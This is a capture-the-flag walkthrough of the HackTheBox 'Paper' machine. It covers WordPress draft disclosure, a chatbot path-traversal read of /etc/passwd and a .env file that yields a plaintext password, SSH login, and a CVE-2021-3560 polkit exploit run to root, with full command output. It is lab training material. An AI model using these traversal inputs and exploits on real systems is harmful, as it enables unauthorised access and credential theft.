Hi everyone! Today’s write-up is on Paper, an easy Linux machine from HackTheBox. This machine requires us to enumerate the HTTP response header to discover the domain name, enumerate the version of WordPress for a vulnerability, and a specific comment in a post before having the knowledge to exploit the vulnerability to read secret content in a draft. Through the draft, we will know that there is another subdomain page for chatting and a secret registration URL to register an account for the chat page. Once registered, we will discover a chatbot with vulnerabilities to arbitrarily read any files in the system as Dwight privilege. Credentials found can be used for SSH for initial access. Finally, linpeas allows us to discover CVE-2021-3560 for privilege escalation. Let’s get started!
Nmap enumeration
kali@kali~$ IP=10.10.11.143 kali@kali~$ sudo nmap -sC -sV -p- $IP Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-05 12:11 EST Nmap scan report for 10.10.11.143 Host is up (0.044s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA) | 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA) |_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519) 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_http-title: HTTP Server Test Page powered by CentOS 443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_http-title: HTTP Server Test Page powered by CentOS | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US | Subject Alternative Name: DNS:localhost.localdomain | Not valid before: 2021-07-03T08:52:34 |_Not valid after: 2022-07-08T10:32:34 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1
Web enumeration (Port 80)

Response header
When checking the HTTP response header, I notice something interesting which is “office.paper” which seems to be the domain name of the website..
kali@kali~$ curl -X HEAD -I http://$IP HTTP/1.1 403 Forbidden Date: Sun, 06 Mar 2022 01:42:08 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 X-Backend-Server: office.paper Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT ETag: "30c0b-5c5c7fdeec240" Accept-Ranges: bytes Content-Length: 199691 Content-Type: text/html; charset=UTF-8
As a result, we can add it into our /etc/hosts file.
kali@kali~$ sudo nano /etc/hosts
In /etc/hosts:
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.143 office.paper
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Change in webpage
After changing the domain name, I went to the domain via http://office.paper and is immediately presented with a new page.

WordPress discovery and scanning
When looking at the main page’s source code via CTRL+U, I noticed “wp-includes” which indicates the website is running WordPress.

Draft hints and vulnerability
When I read the post on “feeling alone”, I noticed an interesting comment.

Nick commented that there is secret content in the drafts.

While using wpscan on the website, I noticed that the WordPress version used on the website is version 5.2.3.
kali@kali~$ wpscan /usr/share/wordlists/rockyou.txt --url http://office.paper _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/|_____/ \___|\__,_|_|
WordPress Security Scanner by the WPScan Team Version 3.8.18 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://office.paper/ [10.10.11.143] [+] Started: Sat Mar 5 21:24:18 2022 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 | - X-Powered-By: PHP/7.2.24 | - X-Backend-Server: office.paper | Found By: Headers (Passive Detection) | Confidence: 100% [+] WordPress readme found: http://office.paper/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05). | Found By: Rss Generator (Passive Detection) | - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator> | - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator> [+] WordPress theme in use: construction-techup | Location: http://office.paper/wp-content/themes/construction-techup/ | Last Updated: 2021-07-17T00:00:00.000Z | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt | [!] The version is out of date, the latest version is 1.4 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1 | Style Name: Construction Techup | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a... | Author: wptexture | Author URI: https://testerwp.com/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=====================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00 [i] No Config Backups Found.
A quick Google of the WordPress version allows me to find that there is a vulnerability that allows us to read drafts on the website. You can take a look at this overview of the vulnerability here and the working PoC here.
Discovery of another subdomain page
Based on the WordPress 5.2.3 vulnerability, I read the draft of the website by visiting http://office.paper/?static=1 on the browser. This allows me to discover the subdomain http://chat.office.paper/. Besides that, there is also the URL to register for the chat system.

Register to the new chat system
Once again, we will need to add chat.office.paper into our /etc/hosts file.
kali@kali~$ sudo nano /etc/hosts
In /etc/hosts:
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.143 office.paper
10.10.11.143 chat.office.paper
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
We can now visit http://chat.office.paper/register/8qozr226AhkCHZdyY on our browser.

Register for a new account. You can use any username, email, and password.
Once you click on “Register a new account”, we will be brought to another page. Click on “Use this username”.

Finally, we will be directed to the dashboard.

recyclops bot arbilitary read
Go to the General chat channel and we will discover the existence of recyclops chatbot where it will read file contents for us.

The General chat also shows us how to interact with the chatbot for files as well as we can direct message the bot.

To direct message the chatbot, click on recyclops’ name and view the full profile.

Arbitrary file disclosure
Using “..” argument, we can actually read outside of the “sales” folder.

Credentials discovered

In ../hubot/.env, I discovered a password, “Queenofblad3s!23”.

Enumerating /etc/passwd allows us to discover existing usernames in the machine using the command “file ../../../etc/passwd”.

Initial access
SSH
Trying the found password on the found usernames, I was able to login to Dwight’s account.
kali@kali~$ ssh dwight@$IP dwight@10.10.11.143's password: Queenofblad3s!23 Activate the web console with: systemctl enable --now cockpit.socket Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23 [dwight@paper ~]$
Obtaining user flag
[dwight@paper ~]$ ls bot_restart.sh hubot sales user.txt [dwight@paper ~]$ cat user.txt 0e1*****************************
Privilege escalation
Linpeas
We first have to download linpeas and transfer it to the victim’s machine.
kali@kali~$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh kali@kali~$ scp linpeas.sh dwight@$IP:/home/dwight/linpeas.sh dwight@10.10.11.143's password: Queenofblad3s!23
In the victim’s machine using the SSH session, we can change its execution permission and run it. Once we run it, we can noticed it is vulnerable to CVE-2021-3560.
[dwight@paper ~]$ chmod +x ./linpeas.sh [dwight@paper ~]$ ./linpeas.sh ... ╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version Sudo version 1.8.29 Vulnerable to CVE-2021-3560 ...
CVE-2021-3560 Polkit Exploitation
A quick Google allows me to find this working exploit here. Since we have SSH session, we can just copy and paste into pevector.py using nano or any text editor of your choice. Once completed, we can run it using Python3 and obtain a root shell.
[dwight@paper ~]$ python3 pevector.py ************** Exploit: Privilege escalation with polkit - CVE-2021-3560 Exploit code written by Ahmad Almorabea @almorabea Original exploit author: Kevin Backhouse For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ ************** [+] Starting the Exploit id: ‘ahmed’: no such user id: ‘ahmed’: no such user id: ‘ahmed’: no such user id: ‘ahmed’: no such user id: ‘ahmed’: no such user id: ‘ahmed’: no such user id: ‘ahmed’: no such user [+] User Created with the name of ahmed [+] Timed out at: 0.006865908438818638 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005 [+] Timed out at: 0.00740670140187632 [+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. bash: cannot set terminal process group (132974): Inappropriate ioctl for device bash: no job control in this shell [root@paper dwight]# id uid=0(root) gid=0(root) groups=0(root) [root@paper dwight]#
Obtain the root flag
[root@paper dwight]# cat /root/root.txt e3c*****************************
I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂